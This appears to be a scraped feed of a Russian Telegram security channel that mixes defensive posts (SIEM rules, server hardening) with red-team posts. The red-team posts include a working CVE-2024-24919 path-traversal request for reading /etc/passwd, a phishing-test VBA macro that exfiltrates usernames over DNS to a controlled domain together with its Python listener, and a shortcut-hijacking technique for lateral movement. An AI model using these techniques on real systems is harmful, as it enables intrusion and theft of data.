Report_Threat_Landscape_RU.pdf
16.7 MB
Приветствую Вас, дорогие друзья!👋🏻
В крайнем своем посте делился с Вами аналитическими отчетами. Коллеги из Kaspersky, как Вы помните, поделились с нами аналитикой по направлениям Incident Response и Managed Detection and Response. И вот на этой неделе они представили на изучение свой отчет-исследование российского ландшафта киберугроз, по аналогии с ранее подготовленным от
Думаю, что в следующих постах наложу друг на друга наши результаты по обработке материалов от
Уверен, что Вам будет интересно и Вы извлечете из них максимальную пользу в своей работе.
#REDtalk #blueteam
В крайнем своем посте делился с Вами аналитическими отчетами. Коллеги из Kaspersky, как Вы помните, поделились с нами аналитикой по направлениям Incident Response и Managed Detection and Response. И вот на этой неделе они представили на изучение свой отчет-исследование российского ландшафта киберугроз, по аналогии с ранее подготовленным от
BI.ZONE. В нем всё, как мы любим: тактики, техники и процедуры злоумышленников (TTPs), применяемое ВПО и т.д. Мы с командой уже взяли его в работу. 🔥Думаю, что в следующих постах наложу друг на друга наши результаты по обработке материалов от
BI.ZONE и Kaspersky и поделюсь с Вами тем, какую практическую пользу мы с командой из них извлекли. Во всяком случае на основе информации от BI.ZONE уже активно разрабатываем правила корреляции и проверяем их с моими "красными" коллегами. 🧑🏻💻Уверен, что Вам будет интересно и Вы извлечете из них максимальную пользу в своей работе.
#REDtalk #blueteam
🔥6👍2🏆2
Привет!
Это подборка каналов участников сообщества ℭ𝔲𝔩𝔱 - самого крутого RedTeam в мире!😎
Inside - канал незаменимого😏 капитана команды Cult, RedTeam Lead'a - N3m351d'ы.
asleep_book - личный блог маленькой пентестерки, которая растет вместе с Культом с момента его появления.🐾
Омский бахантер - канал одного из топовых багхантеров в России и почетного участника команды ℭ𝔲𝔩𝔱, победителя металлургического комбината!🏭
REDTalk — канал @closed_character. Cтоим на стыке синего и красного . Говорим об ИБ так, что поймет даже твоя бабушка, а потом еще и тебя научит 🗿
GOOSE ATT&CK – канал участника команды ℭ𝔲𝔩𝔱, корпората, IT/ИБ-инженера и просто хорошей птицы – Гуся.🐥
BackConnect - канал перспективного специалиста команды ℭ𝔲𝔩𝔱 - profileusername💻 . Придерживается правила 3-х «Р»: ресерчи, райтапы, развлекухи.
HackITEasy - еще один авторский блог, в котором один из наших участников рассказывает просто о сложном.👀
May the Force be with you - канал нового члена команды ℭ𝔲𝔩𝔱. В своём блоге пишет об интересных исследованиях, новых уязвимостях и рассказывает об интересных кейсах в пентесте.
Следуй за Культом! (@illuminatyparty)
🔤 🔤 🔤 🔤
Это подборка каналов участников сообщества ℭ𝔲𝔩𝔱 - самого крутого RedTeam в мире!
Inside - канал незаменимого
asleep_book - личный блог маленькой пентестерки, которая растет вместе с Культом с момента его появления.
Омский бахантер - канал одного из топовых багхантеров в России и почетного участника команды ℭ𝔲𝔩𝔱, победителя металлургического комбината!
REDTalk — канал @closed_character. Cтоим на стыке синего и красного . Говорим об ИБ так, что поймет даже твоя бабушка, а потом еще и тебя научит 🗿
GOOSE ATT&CK – канал участника команды ℭ𝔲𝔩𝔱, корпората, IT/ИБ-инженера и просто хорошей птицы – Гуся.
BackConnect - канал перспективного специалиста команды ℭ𝔲𝔩𝔱 - profileusername
HackITEasy - еще один авторский блог, в котором один из наших участников рассказывает просто о сложном.
May the Force be with you - канал нового члена команды ℭ𝔲𝔩𝔱. В своём блоге пишет об интересных исследованиях, новых уязвимостях и рассказывает об интересных кейсах в пентесте.
Следуй за Культом! (@illuminatyparty)
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6👍3🎉3❤1
Привет, друзья! Сегодня у нас на повестке дня CVE-2024-24919. Эта уязвимость в Check Point Remote Access VPN позволяет читать файлы на хосте (LFI), причем с привилегиями root. Уязвимыми являются следующие продукты:
- CloudGuard Network
- Quantum Maestro
- Quantum Scalable Chassis
- Quantum Security Gateways
- Quantum Spark Appliances
- Версии:
- R77.20 (EOL)
- R77.30 (EOL)
- R80.10 (EOL)
- R80.20 (EOL)
- R80.20.x
- R80.20SP (EOL)
- R80.30 (EOL)
- R80.30SP (EOL)
- R80.40 (EOL)
- R81
- R81.10
- R81.10.x
- R81.20
POC
Рекомендуем срочно установить обновления: https://support.checkpoint.com/results/sk/sk182336
#cve
- CloudGuard Network
- Quantum Maestro
- Quantum Scalable Chassis
- Quantum Security Gateways
- Quantum Spark Appliances
- Версии:
- R77.20 (EOL)
- R77.30 (EOL)
- R80.10 (EOL)
- R80.20 (EOL)
- R80.20.x
- R80.20SP (EOL)
- R80.30 (EOL)
- R80.30SP (EOL)
- R80.40 (EOL)
- R81
- R81.10
- R81.10.x
- R81.20
POC
POST /clients/MyCRL HTTP/1.1
Host: target_host
Content-Length: 63
aCSHELL/../../../../../../../etc/passwd
Рекомендуем срочно установить обновления: https://support.checkpoint.com/results/sk/sk182336
#cve
👍13🥱2😴2🫡2🙉1
💥Привет. хочу поговорить на такую тему:
Допустим, мы - крутая команда пентестеров и редтимиров, и у нас в арсенале есть важный хакерский сервисWebMap и три проблемы: сервис торчит наружу, работает по протоколу http и не требует аутентификации. Вопрос, как сделать так, чтобы нас всех не уволили, добавить шифрование, аутентификацию и при этом оставить возможность подключаться из интернета?
Вот несколько вариантов решения:
1️⃣ VPN - 3 заглавных буквы, а сколько смысла. Ставим Wireguard, генерируем конфиги, проверяем, что порт больше не открыт из вне и радуемся. Теперь только те, у кого есть доступ к “внутренней сети”, могут получить доступ.
Теперь минус - это относительная сложность. Генерировать и управлять конфигами, маршрутами, пробросами портов не то чтобы очень сложно, но и не просто. Для скрытия сети это подойдёт идеально, но для одного сервиса есть способы более элегантные.
2️⃣ Proxy - Золотая середина. Можно просто оборачивать весь http трафик в ssl через nginx-прокси в докер контейнере, да еще и добавить базовую http аутентификацию. Это всё можно сделать на том же сервере, только не забыть убрать порт из публичного доступа.
Запрет на прямой доступ из интернета через iptables
Но и тут есть несколько камней: Трафик проходит через прокси, а значит запрос будет видоизменяться. Например, у меня была ситуация, когда мне нужно было загрузить файл (не скан nmap 😁) на сервер, а он брал и говорил ошибку 413 Payload Too Large. Проблема была в максимальном размере запроса, передаваемом в Nginx. Фиксилось это легко, строчкой
3️⃣ SSH-Tunneling: Уже второй раз ссылаюсь на наш пост про SSH. Моё любимое из трех перечисленных, так как тут всё максимально просто - создаём учётку, исключаем порт из публичного доступа и подключаемся к серверу по SSH с флагом
Недостатков я тут вообще не вижу, разве что “неконтролируемый” доступ, так как при подключении по ssh, клиент, очевидно, помимо туннеля к нашему сервису, имеет SSH сессию. Но думаю, это можно пофиксить
Была у меня ситуация, когда для стандартного сценария социалки, при разворачивании GoPhish через 5 секунд адрес моего сервера в Google Chrome был помечен как самый опасный в мире и перед его посещением было буквально окно с красным фоном и предупреждением на весь экран. Оказалось, что это всё из-за торчащей наружу админки GoPhish, которую обнаружил бот гугла. Я просто сменил белый адрес и закрыл доступ к админке через ssh-туннель, и всё стало отлично.
Допустим, мы - крутая команда пентестеров и редтимиров, и у нас в арсенале есть важный хакерский сервис
Вот несколько вариантов решения:
1️⃣ VPN - 3 заглавных буквы, а сколько смысла. Ставим Wireguard, генерируем конфиги, проверяем, что порт больше не открыт из вне и радуемся. Теперь только те, у кого есть доступ к “внутренней сети”, могут получить доступ.
Теперь минус - это относительная сложность. Генерировать и управлять конфигами, маршрутами, пробросами портов не то чтобы очень сложно, но и не просто. Для скрытия сети это подойдёт идеально, но для одного сервиса есть способы более элегантные.
2️⃣ Proxy - Золотая середина. Можно просто оборачивать весь http трафик в ssl через nginx-прокси в докер контейнере, да еще и добавить базовую http аутентификацию. Это всё можно сделать на том же сервере, только не забыть убрать порт из публичного доступа.
# HTTPS сервер
server {
listen 443 ssl;
server_name example.com;
# Пути к сертификатам
ssl_certificate /etc/nginx/certs/fullchain.pem;
ssl_certificate_key /etc/nginx/certs/privkey.pem;
# Настройки HTTPS
ssl_protocols TLSv1.2 TLSv1.3;
ssl_prefer_server_ciphers on;
ssl_ciphers 'EECDH+AESGCM:EDH+AESGCM:AES256+EECDH:AES256+EDH';
# Логика обработки запросов
location / {
proxy_pass http://127.0.0.1:80;
# HTTP Basic Auth
auth_basic "Restricted Content";
auth_basic_user_file /etc/nginx/.htpasswd;
}
}
Запрет на прямой доступ из интернета через iptables
iptables -A INPUT -p tcp --dport 80 -s 127.0.0.1 -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j DROP
Но и тут есть несколько камней: Трафик проходит через прокси, а значит запрос будет видоизменяться. Например, у меня была ситуация, когда мне нужно было загрузить файл (не скан nmap 😁) на сервер, а он брал и говорил ошибку 413 Payload Too Large. Проблема была в максимальном размере запроса, передаваемом в Nginx. Фиксилось это легко, строчкой
client_max_body_size 0; в вышеуказанном конфиге Nginx. Также любой для нашего проксируемого приложения любой адрес запроса будет 127.0.0.1, так как он также проходит через прокси. Это тоже фиксится строчкой в конфиге, но неприятен сам факт изменения заголовков. Есть еще самоподписываемые сертификаты, но это так, чтобы держать в голове. 3️⃣ SSH-Tunneling: Уже второй раз ссылаюсь на наш пост про SSH. Моё любимое из трех перечисленных, так как тут всё максимально просто - создаём учётку, исключаем порт из публичного доступа и подключаемся к серверу по SSH с флагом
-L 80:127.0.0.1:80. Таким образом убиваем трёх зайцев - Весь трафик передается в шифрованном виде через туннель SSH, аутентификация прилагается, да еще и сам порт будет полностью невидимым для внешней сети. Можно отключить ICMP, изменить порт 22 на какой-нибудь 13372 и быть практически невидимым. Для ботов уж точноНедостатков я тут вообще не вижу, разве что “неконтролируемый” доступ, так как при подключении по ssh, клиент, очевидно, помимо туннеля к нашему сервису, имеет SSH сессию. Но думаю, это можно пофиксить
Была у меня ситуация, когда для стандартного сценария социалки, при разворачивании GoPhish через 5 секунд адрес моего сервера в Google Chrome был помечен как самый опасный в мире и перед его посещением было буквально окно с красным фоном и предупреждением на весь экран. Оказалось, что это всё из-за торчащей наружу админки GoPhish, которую обнаружил бот гугла. Я просто сменил белый адрес и закрыл доступ к админке через ssh-туннель, и всё стало отлично.
🔥9👍3👀2
Вот как-то так. Мы используем все три способа, в зависимости от ситуации. Может это и кажется смешным, но я и правда встретился с ситуацией, в которой один популярный хостинг, не буду показывать пальцем, имеет возможность по клику предустанавливать на ваш VPS wg-easy, которая имеет веб-интерфейс для генерации пользователей в Wireguard. Вот только этот веб-сервис (работающий в контейнере) не шифрует трафик и довольные обладатели собственного VPN качают сгенерированные конфиги через весь интернет прямо по http. Тут как раз очень пригодился бы прокси.
#redteam #ToolTricks
#redteam #ToolTricks
🔥10👍6👾2
Привет друзья! 👋
В мире технологий, где возможности кажутся бесконечными, есть моменты, когда что-то привычное и удобное может неожиданно стать источником потенциальных угроз. Особенно это касается контейнеризации, где одной из самых популярных платформ является Docker🐳 . Docker позволяет разработчикам создавать, развертывать и управлять приложениями в контейнерах, предоставляя гибкость и масштабируемость. Но, как и при создании любой технологии, вопрос безопасности стоял даже не на втором месте, поэтому бездумное использование может привести к плачевным последствиям ⚠️.
Как раз об этом и моя статья . Приятного чтения! Надеюсь, она будет вам полезной😊
🔗 Статья доступна по ссылке: https://shankdy.notion.site/DOCKER-e0d38a363d6247eb8052b9055a1d52cf
#redteam
В мире технологий, где возможности кажутся бесконечными, есть моменты, когда что-то привычное и удобное может неожиданно стать источником потенциальных угроз. Особенно это касается контейнеризации, где одной из самых популярных платформ является Docker
Как раз об этом и моя статья . Приятного чтения! Надеюсь, она будет вам полезной
🔗 Статья доступна по ссылке: https://shankdy.notion.site/DOCKER-e0d38a363d6247eb8052b9055a1d52cf
#redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
shankdy on Notion
Темные уголки DOCKER: Когда дверь остается открытой
| Notion
| Notion
Автор: @closed_character
🔥12👍4❤2
Приветствую Вас, дорогие друзья!👋🏻
Сегодня поговорим с Вами о том, как выявлять удаленные сессии в PowerShell.
1️⃣ Почему это важно?
Злоумышленники могут использовать удаленные сеансы PowerShell для выполнения кода на удаленных хостах (это прям целевой сценарий, который мы хотим отслеживать). Вы можете сказать, что есть и RDP, и нагрузки типа Meterpreter (если говорить о "хакерских" инструментах). И будете абсолютно правы. Одно не заменяет другое, и все сценарии, которые для Вас будут либо однозначно нелегитимными, либо обращающими внимание, должны быть реализованы. Для нас, например, удаленные сессии в PowerShell - это повод обратить внимание, потому что явление совсем нечастое.
2️⃣ Что говорит MITRE ATT&CK?
Рассматриваемый нами сценарий относится к техникам T1059.001 (PowerShell) и T1021.006 (Windows Remote Management). Тактики - TA0002 (Execution) и TA0008 (Lateral Movement).
3️⃣ Логика работы.
Для выявления этого сценария мы с командой написали соответствующее правило корреляции в нашей SIEM. Использовали 3 логики: 2 непосредственно для выявления удаленной сессии и 1 для выявления процессов, запущенных в ходе удаленной сессии PowerShell.
Логика №1:
Требуется следить за созданием процесса wsmprovhost.exe (связан с Windows Management Service) на атакуемом хосте. Т.е. события с EventID 4688 журнала Security.
Условие работы:
Логика №2:
WinRM (Windows Remote Management) для установления удаленной сессии по умолчанию использует порты TCP/5985 (HTTP) или TCP/5986 (HTTPS). В связи с этим требуется следить за разрешением соединений по этим портам (EventID 5156 журнала Security) из-под УЗ, не относящихся к сервисным (NOT FROM 'NT AUTHORITY'), чтобы не "утонуть" в false-positive сработках.
Условие работы:
Логика №3:
Для выявления процессов, запущенных в ходе удаленной сессии PowerShell, требуется следить за созданием процессом wsmprovhost.exe новых процессов (т.е. когда wsmprovhost.exe - родительский). Т.е. события с EventID 4688 журнала Security.
Условие работы:
Если Вы используете Sysmon или, например, EDR-агенты, то не забудьте также добавить логику работы с привязкой к этим источникам событий (у них будут свои EventID. Например, у Sysmon создание нового процесса отмечается с EventID = 1).
В результате дополнительной работы с обогащениями Вы можете получать довольно-таки информативные алерты (см. скриншоты), в которых для оперативности собрана вся первично важная информация.
На этом у меня сегодня всё, если Вам интересен такой формат постов, то буду дальше описывать некоторые наши наработки✌🏻✌🏻
#REDtalk #blueteam
Сегодня поговорим с Вами о том, как выявлять удаленные сессии в PowerShell.
1️⃣ Почему это важно?
Злоумышленники могут использовать удаленные сеансы PowerShell для выполнения кода на удаленных хостах (это прям целевой сценарий, который мы хотим отслеживать). Вы можете сказать, что есть и RDP, и нагрузки типа Meterpreter (если говорить о "хакерских" инструментах). И будете абсолютно правы. Одно не заменяет другое, и все сценарии, которые для Вас будут либо однозначно нелегитимными, либо обращающими внимание, должны быть реализованы. Для нас, например, удаленные сессии в PowerShell - это повод обратить внимание, потому что явление совсем нечастое.
2️⃣ Что говорит MITRE ATT&CK?
Рассматриваемый нами сценарий относится к техникам T1059.001 (PowerShell) и T1021.006 (Windows Remote Management). Тактики - TA0002 (Execution) и TA0008 (Lateral Movement).
3️⃣ Логика работы.
Для выявления этого сценария мы с командой написали соответствующее правило корреляции в нашей SIEM. Использовали 3 логики: 2 непосредственно для выявления удаленной сессии и 1 для выявления процессов, запущенных в ходе удаленной сессии PowerShell.
Логика №1:
Требуется следить за созданием процесса wsmprovhost.exe (связан с Windows Management Service) на атакуемом хосте. Т.е. события с EventID 4688 журнала Security.
Условие работы:
NewProcessName endsWith 'wsmprovhost.exe' AND (WinEventLog = 'Security' AND EventID='4688')
Логика №2:
WinRM (Windows Remote Management) для установления удаленной сессии по умолчанию использует порты TCP/5985 (HTTP) или TCP/5986 (HTTPS). В связи с этим требуется следить за разрешением соединений по этим портам (EventID 5156 журнала Security) из-под УЗ, не относящихся к сервисным (NOT FROM 'NT AUTHORITY'), чтобы не "утонуть" в false-positive сработках.
Условие работы:
(WinEventLog = 'Microsoft-Windows-Security-Auditing' AND EventID = '5156') AND (UserName NOT LIKE '%nt authority%') AND (DestinationPort = '5985' OR DestinationPort = '5986')
Логика №3:
Для выявления процессов, запущенных в ходе удаленной сессии PowerShell, требуется следить за созданием процессом wsmprovhost.exe новых процессов (т.е. когда wsmprovhost.exe - родительский). Т.е. события с EventID 4688 журнала Security.
Условие работы:
ParentProcess = 'wsmprovhost.exe' AND (WinEventLog = 'Security' AND EventID='4688')
Если Вы используете Sysmon или, например, EDR-агенты, то не забудьте также добавить логику работы с привязкой к этим источникам событий (у них будут свои EventID. Например, у Sysmon создание нового процесса отмечается с EventID = 1).
В результате дополнительной работы с обогащениями Вы можете получать довольно-таки информативные алерты (см. скриншоты), в которых для оперативности собрана вся первично важная информация.
На этом у меня сегодня всё, если Вам интересен такой формат постов, то буду дальше описывать некоторые наши наработки✌🏻✌🏻
#REDtalk #blueteam
🔥7❤🔥5
Дамы и господа, всех приветствую!🫶🏻
В нашей команде авторов небольшое пополнение - меня зовут Комаров Герман (@gkomarov23) и я тружусь во славу синих в команде @dolgihser
Несколько фактов о себе:
1️⃣ Самоучка
2️⃣ Получаю огромное удовольствие от обучения коллег первой линии
3️⃣ Сталкивался с работой apt-группировок
Перед собой ставлю задачу рассказать простым языком об интересных и актуальных техниках, которыми пользуются злоумышленники, и если по какой-либо из озвученных мной тем будет повышенный интерес, мы с командой красных составим более детальный технический разбор с демонстрацией инструментов, которые мы использовали, а также методами и способами защиты.
Будет интересно👌🏻
#REDtalk #blueteam
В нашей команде авторов небольшое пополнение - меня зовут Комаров Герман (@gkomarov23) и я тружусь во славу синих в команде @dolgihser
Несколько фактов о себе:
1️⃣ Самоучка
2️⃣ Получаю огромное удовольствие от обучения коллег первой линии
3️⃣ Сталкивался с работой apt-группировок
Перед собой ставлю задачу рассказать простым языком об интересных и актуальных техниках, которыми пользуются злоумышленники, и если по какой-либо из озвученных мной тем будет повышенный интерес, мы с командой красных составим более детальный технический разбор с демонстрацией инструментов, которые мы использовали, а также методами и способами защиты.
Будет интересно👌🏻
#REDtalk #blueteam
🔥6👍2❤1🎉1
У меня к вам такой вопрос:
Используете ли вы свой личный ноутбук или компьютер для работы с корпоративными документами, проектами? Подключаетесь ли к корпоративной сети, с личных устройств? (Если да, ставь сходу 👾)
Казалось бы, что тут может быть такого, но..
Если посмотреть на это с точки зрения информационной безопасности вы являетесь так называемой "точкой входа" в корпоративную сеть.
У вас может стоять антивирус💉, вы можете знать, что такое цифровая гигиена, но вы - потенциально "самое слабое звено" во всей цепи которую кропотливо выстраивают сотрудники ИБ, и вот почему:
1. На ваше устройство не применяются групповые политики, которые существуют в организации (подключение к мониторингу🛡, где живые люди, будут на страже вашего устройства в режиме 24\7, а также всеми любимая регулярная смена пароля ну и т.п.)
2. Мало кто занимается разграничением прав у себя на устройстве, как правило у вашей УЗ права администратора😎 (что не очень хорошо)
3. Вы вольны скачивать что угодно и откуда угодно, это же ведь ваш компьютер💻
При попадании на хост злоумышленник собирает информацию о том, где он оказался, и, когда поймет, что это устройство сотрудника крупной организации, в ход могут пойти разные сценарии, от загрузки стиллеров🦠 до продажи доступа к вашему устройству в даркнете и тогда могут прийти ребята посерьезней🥷.
Мой посыл достаточно прост: не смешивайте работу и личное (и я не только про ваши устройства), проверяйте, что вы загружаете и откуда, и берегите свои данные
Если понравился пост, поддержите 👍 и тогда дальше я расскажу о тех вирусах, с которыми вы можете столкнуться, загружая все подряд из интернета
#REDtalk #blueteam
Используете ли вы свой личный ноутбук или компьютер для работы с корпоративными документами, проектами? Подключаетесь ли к корпоративной сети, с личных устройств? (Если да, ставь сходу 👾)
Казалось бы, что тут может быть такого, но..
Если посмотреть на это с точки зрения информационной безопасности вы являетесь так называемой "точкой входа" в корпоративную сеть.
У вас может стоять антивирус💉, вы можете знать, что такое цифровая гигиена, но вы - потенциально "самое слабое звено" во всей цепи которую кропотливо выстраивают сотрудники ИБ, и вот почему:
1. На ваше устройство не применяются групповые политики, которые существуют в организации (подключение к мониторингу🛡, где живые люди, будут на страже вашего устройства в режиме 24\7, а также всеми любимая регулярная смена пароля ну и т.п.)
2. Мало кто занимается разграничением прав у себя на устройстве, как правило у вашей УЗ права администратора😎 (что не очень хорошо)
3. Вы вольны скачивать что угодно и откуда угодно, это же ведь ваш компьютер💻
При попадании на хост злоумышленник собирает информацию о том, где он оказался, и, когда поймет, что это устройство сотрудника крупной организации, в ход могут пойти разные сценарии, от загрузки стиллеров🦠 до продажи доступа к вашему устройству в даркнете и тогда могут прийти ребята посерьезней🥷.
Мой посыл достаточно прост: не смешивайте работу и личное (и я не только про ваши устройства), проверяйте, что вы загружаете и откуда, и берегите свои данные
Если понравился пост, поддержите 👍 и тогда дальше я расскажу о тех вирусах, с которыми вы можете столкнуться, загружая все подряд из интернета
#REDtalk #blueteam
👍8👾8🔥4👌1🤡1
А ты используешь личное устройство для работы?
Anonymous Poll
49%
Да, не вижу тут ничего такого
51%
Нет, я за безопасность
👍4🤔1
Я долго думала с какого поста стоит начать и после долгих раздумий решила чуть-чуть поделиться теорией и рассказать историю из своей практики😳 . Приятного чтения)
Итак, сегодняшней темой поста станет эксфильтрация, один из этапов постэксплуатации.
😦 Что такое❓
Все просто: это передача файлов, а, если быть точной, то со скомпроментированного хоста на машину атакующего (victim -> attacker).
😦 Какая бывает❓
В зависимости от инфраструктуры и обстоятельств можно выделить, так сказать, базу:
• через TCP
• через SMB
• через HTTP
• с использованием FTP
• с помощью TFTP
• через ICMP
• через DNS
😦 Для чего вам эта инфа❓
Для красненьких полезно уметь тащить файлики к себе на хост, а синеньким стоит внимательнее смотреть трафик, как бы там не полетела чья-нибудь sensitive data в DNS-трафике.
😋 Тру стори
Итак, приходит условный Заказчик и говорит:
😐 .
Однако действительно ли все фильтруется❓ 😎
Как известно, любая изолированная внутренняя сеть как-то взаимодействует с внешним миром, например, для отправки электронной почты или загрузки обновлений. Поэтому DNS почти всегда будет ходить во вне и резолвить внешние адреса.
Соответственно для проведения социотехнического тестирования было принято использовать Exel-файл с VBA скриптом, который представлял из себя что-то вроде:
Он резолвил поддомен третьего уровня нашей DNS-зоны, передавая в узле имя пользователя, который запустил макрос.
В качестве DNS-сервера выступал простой питоновский скрипт на сокетах:
Как-то так DNS-экфильтрация стала реальным живым кейсом и вектором утечки данных в отчете Заказчика)
😦 Ну вроде все просто, а что по детектам❓
Детектят эксфильтрацию в основном по подозрительному трафику и сигнатурам используемых инструментов.
На этом для первого раза, пожалуй, все :)
P.S.
Если есть какие-то темы/вектора, которые хотелось бы обозреть по-подробнее, напишите в комментарии🤗 ⬇️
#REDTalk #redteam
Итак, сегодняшней темой поста станет эксфильтрация, один из этапов постэксплуатации.
Все просто: это передача файлов, а, если быть точной, то со скомпроментированного хоста на машину атакующего (victim -> attacker).
‼️ Отличаем от инфильтрации (передача по цепочке attacker -> victim)
В зависимости от инфраструктуры и обстоятельств можно выделить, так сказать, базу:
• через TCP
• через SMB
• через HTTP
• с использованием FTP
• с помощью TFTP
• через ICMP
• через DNS
Для красненьких полезно уметь тащить файлики к себе на хост, а синеньким стоит внимательнее смотреть трафик, как бы там не полетела чья-нибудь sensitive data в DNS-трафике.
Итак, приходит условный Заказчик и говорит:
- Потратил много денях на обучение сотрудников, хочу проверить сколько из них с радостью откроют фишинговое письмо да еще и с другом поделятся.Вроде тривиальная на первый взгляд задача, не требуется компрометация хоста, просто пересчитать по головам. Однако во внутренней сети проксируется http, фильтруются любые запросы во вне
Однако действительно ли все фильтруется
Как известно, любая изолированная внутренняя сеть как-то взаимодействует с внешним миром, например, для отправки электронной почты или загрузки обновлений. Поэтому DNS почти всегда будет ходить во вне и резолвить внешние адреса.
Соответственно для проведения социотехнического тестирования было принято использовать Exel-файл с VBA скриптом, который представлял из себя что-то вроде:
Sub PerformNslookup()
Dim username As String
Dim domain As String
Dim command As String
WhoIsUser = Environ("UserName")
domain = "sub.domain.ru"
command = "nslookup " & WhoIsUser & "." & domain
Shell "cmd /c " & command, vbNormalFocus
End Sub
Он резолвил поддомен третьего уровня нашей DNS-зоны, передавая в узле имя пользователя, который запустил макрос.
В качестве DNS-сервера выступал простой питоновский скрипт на сокетах:
import socket
import re
import binascii
from dnslib import DNSRecord
UDP_IP = "0.0.0.0"
UDP_PORT = 53
sock = socket.socket(socket.AF_INET,
socket.SOCK_DGRAM)
sock.bind((UDP_IP, UDP_PORT))
while True:
byteData, addr = sock.recvfrom(2048)
try:
message = binascii.unhexlify(binascii.b2a_hex(byteData))
message = DNSRecord.parse(message)
except Exception as e:
print(e)
continue
result = re.search(r'\;(\S+)\.sub\.domain\.ru', str(message), re.MULTILINE)
if result:
print('detected:', result.group(1))
Как-то так DNS-экфильтрация стала реальным живым кейсом и вектором утечки данных в отчете Заказчика)
Детектят эксфильтрацию в основном по подозрительному трафику и сигнатурам используемых инструментов.
На этом для первого раза, пожалуй, все :)
P.S.
Если есть какие-то темы/вектора, которые хотелось бы обозреть по-подробнее, напишите в комментарии
#REDTalk #redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
❤16🔥12⚡3👾1
Доброго всем денечка🐾
На связи @deadunii, mi amo Кристина Ситникова, мой любимый цвет красный, с моими уважаемыми коллегами по цеху вы уже знакомы по постам выше :)
Большая часть моего опыта это ломание ADшек финтеха, для меня WannaCry не страшный заголовок из прошлого, а удачная находка в сети Заказчика под названием EternalBlue
Постараюсь делиться самым интересным из мира пентеста просто и с кайфом, служу редтиму🫡
На страже ваших паролей Qwerty12345678, до встречи в новых постах🤗
#REDtalk #redteam
На связи @deadunii, mi amo Кристина Ситникова, мой любимый цвет красный, с моими уважаемыми коллегами по цеху вы уже знакомы по постам выше :)
-Скажи мне три слова, которые хочет услышать любая девушка
- whoami
NT AUTHORITY\SYSTEM
Большая часть моего опыта это ломание ADшек финтеха, для меня WannaCry не страшный заголовок из прошлого, а удачная находка в сети Заказчика под названием EternalBlue
Постараюсь делиться самым интересным из мира пентеста просто и с кайфом, служу редтиму
На страже ваших паролей Qwerty12345678, до встречи в новых постах
#REDtalk #redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
❤16👏3🎉3🔥2👨💻2
💥 Привет, недавно мне попалась HTB коробка, в которой вектором атаки для бокового перемещения была подделка ярлыка.
Провел небольшой ресерч и делюсь результатами
❓ Является ли ярлык файлом?
Да. Это файл с расширением .lnk, но explorer не будет его показывать, даже если поставить все галочки на отображение расширений.
❓ Как посмотреть .lnk файл.
Explorer будет думать, что это ссылка, даже если изменить расширение. Самый простой способ посмотреть атрибуты ярлыка - через WScript
Но если хочется посмотреть конкретно файл, то его можно открыть в линуксе. Смотрим содержимое и видим тоже самое, что было показано выше
Провел небольшой ресерч и делюсь результатами
Да. Это файл с расширением .lnk, но explorer не будет его показывать, даже если поставить все галочки на отображение расширений.
Explorer будет думать, что это ссылка, даже если изменить расширение. Самый простой способ посмотреть атрибуты ярлыка - через WScript
PS C:\share> $shell = New-Object -ComObject WScript.Shell
PS C:\share> $shortcut = $shell.CreateShortcut(".\Microsoft Edge.lnk")
PS C:\share> $shortcut | Select-Object *
FullName : c:\share\Microsoft Edge.lnk
Arguments :
Description : Просмотр веб-страниц
Hotkey :
IconLocation : C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,0
RelativePath :
TargetPath : C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
WindowStyle : 1
WorkingDirectory : C:\Program Files (x86)\Microsoft\Edge\Application
Но если хочется посмотреть конкретно файл, то его можно открыть в линуксе. Смотрим содержимое и видим тоже самое, что было показано выше
┌──(kali㉿kali)-[~]
└─$ file Microsoft\ Edge.lnk
Microsoft Edge.lnk: MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Icon number=0, Unicoded, HasExpIcon "%ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe", MachineID desktop-ubegqsr KnownFolderID 7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E, Archive, ctime=Thu Aug 5 19:41:46 2021, atime=Sat Jun 22 21:48:12 2024, mtime=Thu Jun 13 04:14:38 2024, length=3883560, window=normal, IDListSize 0x0231, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\", LocalBasePath "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
┌──(kali㉿kali)-[~]
└─$ hexdump -C Microsoft\ Edge.lnk
00000000 4c 00 00 00 01 14 02 00 00 00 00 00 c0 00 00 00 |L...............|
00000010 00 00 00 46 df 40 00 00 20 00 00 00 ac bc 7c 12 |...F.@.. .....|.|
...
000002a0 00 00 00 26 1d 18 fa 10 00 00 00 00 43 3a 5c 50 |...&........C:\P|
000002b0 72 6f 67 72 61 6d 20 46 69 6c 65 73 20 28 78 38 |rogram Files (x8|
000002c0 36 29 5c 4d 69 63 72 6f 73 6f 66 74 5c 45 64 67 |6)\Microsoft\Edg|
000002d0 65 5c 41 70 70 6c 69 63 61 74 69 6f 6e 5c 6d 73 |e\Application\ms|
000002e0 65 64 67 65 2e 65 78 65 00 00 14 00 1f 04 40 04 |edge.exe......@.|
...
00000980 d5 91 69 6c a4 6c 00 00 00 00 00 00 00 00 00 00 |..il.l..........|
00000990 00 00 |..|
00000992
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6❤2
Собственно, выполнение кода от другого пользователя. Конечно, большинство ярлыков валяются на рабочем столе или в
C:\ProgramData\Microsoft\Windows\Start Menu\Programs (то, что содержится в меню Пуск), но бывают ситуации, когда ими пользуются, к примеру, из общих сетевых папок, и если у нас есть права на запись в директорию, то можно изменить файл
PS C:\share> $objShell = New-Object -ComObject WScript.Shell
PS C:\share> $lnk = $objShell.CreateShortcut("c:\share\Microsoft Edge.lnk")
PS C:\share> $lnk.TargetPath = "C:\windows\system32\calc.exe"
PS C:\share> $lnk.Save()
PS C:\share> $shell = New-Object -ComObject WScript.Shell
PS C:\share> $shortcut = $shell.CreateShortcut(".\Microsoft Edge.lnk")
PS C:\share> $shortcut | Select-Object *
FullName : c:\share\Microsoft Edge.lnk
Arguments :
Description : Просмотр веб-страниц
Hotkey :
IconLocation : C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,0
RelativePath :
TargetPath : C:\Windows\System32\calc.exe
WindowStyle : 1
